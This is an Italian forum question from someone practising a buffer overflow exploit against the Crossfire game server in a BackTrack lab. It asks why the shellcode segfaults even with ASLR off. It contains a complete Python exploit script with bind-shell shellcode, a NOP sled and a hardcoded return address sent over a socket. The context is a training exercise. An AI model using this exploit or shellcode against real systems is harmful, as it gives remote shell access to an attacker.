Sto praticando lo sfruttamento del buffer overflow di Linux. quando si tenta di sfruttare una vulnerabilità in crossfire, tutto funziona bene e il codice shell viene inserito nel posto giusto e il flusso del programma viene reindirizzato allo shellcode, tuttavia, quando si avvia il codice shell, il programma fallisce.
Versione del sistema operativo (bt5 R3): Linux bt 3.2.6 # 1 SMP Fri Feb 17 10:40:05 EST 2012 i686 GNU / Linux
exploit code:
import socket, sys
host = sys.argv[1]
//0x8134e77 jump eax
//0xb7dadad6 nop sled address
shellcode= ("\xcc\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
"\x5b\x5e\x52\x68\xff\x02\x11\x5c\x6a\x10\x51\x50\x89\xe1\x6a"
"\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0"
"\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f"
"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0"
"\x0b\xcd\x80")
crash = "\x90" *199 + shellcode + "\x43" * 4090 + "\xd6\xda\xda\xb7" + "D" * 7
buffer= "\x11(setup sound " + crash + "\x90\x00#"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[*]Sending evil buffer..."
s.connect((host, 13327))
print (s.recv(1024))
s.send(buffer)
s.close()
print "[*]Payload Sent !"
Ho posizionato un punto di interruzione prima dello shellcode e il flusso di esecuzione lo ha eseguito correttamente, tuttavia, dopo aver interrotto il programma, si è verificato il seguente messaggio: "Programma ricevuto segnale SIGSEGV, errore di segmentazione. 0xb7daeb36 in ?? () "
Durante l'ispezione di questo indirizzo, è pieno di zeri!
Ho già disattivato ASLR prima di iniziare l'esercizio e mi chiedo se esiste un altro meccanismo di protezione che impedisca lo sfruttamento?